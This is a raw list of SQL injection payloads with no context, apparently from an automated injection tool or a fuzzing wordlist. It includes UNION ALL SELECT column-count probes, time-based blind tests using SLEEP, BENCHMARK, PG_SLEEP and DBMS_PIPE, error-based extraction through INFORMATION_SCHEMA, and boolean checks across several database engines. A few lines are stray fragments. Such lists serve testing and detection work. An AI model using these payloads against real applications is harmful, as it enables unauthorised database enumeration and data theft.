1 " ) UNION ALL SELECT NULL , NULL , NULL , NULL --
1 ' UNION ALL SELECT NULL , NULL , NULL , NULL , NULL , NULL , NULL , NULL#
1 ) )
-6611 % " ) ) ) UNION ALL SELECT 3112 #
1 ' IN BOOLEAN MODE ) UNION ALL SELECT NULL , NULL , NULL , NULL#
-9808 ' IN BOOLEAN MODE ) UNION ALL SELECT 2528 , 2528 , 2528 --
1 ) OR BENCHMARK ( 10000000 , MD5 ( 1 ) ) #
1 % " ) UNION ALL SELECT NULL , NULL , NULL , NULL , NULL --
1 % ' ) AND 2006 = 2006
1 " ) ) ) UNION ALL SELECT NULL , NULL , NULL , NULL , NULL , NULL , NULL , NULL , NULL , NULL --
-9997 ' UNION ALL SELECT 9347 , 9347 , 9347 , 9347 , 9347 , 9347 , 9347 #
1 " ) ) UNION ALL SELECT NULL , NULL , NULL , NULL , NULL --
1 % " ) ) UNION ALL SELECT NULL , NULL , NULL --
1 % " UNION ALL SELECT NULL , NULL , NULL , NULL , NULL , NULL , NULL#
1 ' ) AND CHAR ( 120 ) ||CHAR ( 106 ) ||CHAR ( 117 ) ||CHAR ( 85 ) = REGEXP_SUBSTRING ( REPEAT ( RIGHT ( CHAR ( 9981 ) ,0 ) ,5000000000 ) ,NULL ) AND ( ' QUTM ' = ' QUTM
. S
1 '+ ( SELECT TTAE WHERE 4601 = 4601 OR 2633 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 65 ) ||CHR ( 65 ) ||CHR ( 103 ) ,5 ) ) +'
-7230 ' ) OR 2724 IN ( ( CHAR ( 113 ) +CHAR ( 113 ) +CHAR ( 112 ) +CHAR ( 106 ) +CHAR ( 113 ) + ( SELECT ( CASE WHEN ( 2724 = 2724 ) THEN CHAR ( 49 ) ELSE CHAR ( 48 ) END ) ) +CHAR ( 113 ) +CHAR ( 122 ) +CHAR ( 118 ) +CHAR ( 122 ) +CHAR ( 113 ) ) ) AND ( ' KHTC ' = ' KHTC
1 % ' ) ) AND MAKE_SET ( 8403 = 8403,8899 ) AND ( ( ' % ' = '
1 ' )
1 % " ) ) ) UNION ALL SELECT NULL , NULL , NULL , NULL , NULL , NULL --
1 % '|| ( SELECT ' % '
1 ) ) ) UNION ALL SELECT NULL , NULL , NULL , NULL , NULL --
)
1 % " ) ) ) AND 7756 = DBMS_UTILITY.SQLID_TO_SQLHASH ( ( CHR ( 113 ) ||CHR ( 113 ) ||CHR ( 112 ) ||CHR ( 106 ) ||CHR ( 113 ) || ( SELECT ( CASE WHEN ( 7756 = 7756 ) THEN 1 ELSE 0 END ) FROM DUAL ) ||CHR ( 113 ) ||CHR ( 122 ) ||CHR ( 118 ) ||CHR ( 122 ) ||CHR ( 113 ) ) ) AND ( ( ( " % " = "
1 UNION ALL SELECT NULL#
1 ) AS TBVE WHERE 4828 = 4828
-8053 " WHERE 5458 = 5458 OR 9323 = 9323 #
1 '|| ( SELECT ' NZJZ ' WHERE 3539 = 3539 AND 8148 = LIKE ( ' ABCDEFG ' , SLEEP ( 5 ) #
1 % " ) UNION ALL SELECT NULL , NULL , NULL , NULL , NULL , NULL , NULL#
1 " UNION ALL SELECT NULL , NULL , NULL , NULL , NULL , NULL#
-9484 ' OR ( 7129 = 2349 ) *2349 AND ' FCSA ' LIKE ' FCSA ' LIKE ' FCSA
1 % " UNION ALL SELECT NULL , NULL , NULL , NULL#
1 % ' ) ) ) UNION ALL SELECT NULL , NULL , NULL , NULL , NULL , NULL , NULL --
1 % " ) ) UNION ALL SELECT NULL , NULL , NULL , NULL , NULL , NULL --
1 % " UNION ALL SELECT NULL , NULL , NULL , NULL --
1 ' ) AND SLEEP ( 5 ) #
1 ' ) WHERE 3767 = 3767 AND 6240 = ( ' QQPJQ '|| ( SELECT CASE 6240 WHEN 6240 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||' QZVZQ ' ) --
1 % " UNION ALL SELECT NULL , NULL , NULL , NULL , NULL --
1 ) OR SLEEP ( 5 ) #
1 " ) ) UNION ALL SELECT NULL , NULL , NULL , NULL , NULL , NULL , NULL#
1 ' UNION ALL SELECT NULL , NULL , NULL , NULL , NULL , NULL#
1 ' OR ( SELECT 9173 FROM ( SELECT COUNT ( * ) ,CONCAT ( 0X7171706A71, ( SELECT ( ELT ( 9173 = 9173,1 ) ) ) ,0X717A767A71,FLOOR ( RAND ( 0 ) *2 ) ) X FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY X ) A ) AND ' WWWB ' = ' WWWB
1 " ) ) AND 8594 = ( SELECT 8594 FROM PG_SLEEP ( 5 ) ) --
1 " ) AND 6240 = ( 'QQPJQ'|| ( SELECT CASE 6240 WHEN 6240 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||'QZVZQ' ) AND ( " LIAR " = " LIAR
1 " ) WHERE 9295 = 9295 AND SLEEP ( 5 ) #
1 " ) ) AND ( SELECT 2* ( IF ( ( SELECT * FROM ( SELECT CONCAT ( 0X7171706A71, ( SELECT ( ELT ( 3484 = 3484,1 ) ) ) ,0X717A767A71,0X78 ) ) S ) , 8446744073709551610, 8446744073709551610 ) ) ) AND ( ( " LLGB " LIKE " LLGB
1 ' IN BOOLEAN MODE ) UNION ALL SELECT NULL , NULL , NULL , NULL#
1 '|| ( SELECT ' NPDX ' FROM DUAL WHERE 9486 = 9486 AND SLEEP ( 5 ) ) ||'
1 ' ) ) AND 2853 = CAST ( ( CHR ( 113 ) ||CHR ( 113 ) ||CHR ( 112 ) ||CHR ( 106 ) ||CHR ( 113 ) ) || ( SELECT ( CASE WHEN ( 2853 = 2853 ) THEN 1 ELSE 0 END ) ) ::TEXT|| ( CHR ( 113 ) ||CHR ( 122 ) ||CHR ( 118 ) ||CHR ( 122 ) ||CHR ( 113 ) ) AS NUMERIC ) AND ( ( ' ESAL ' = ' ESAL
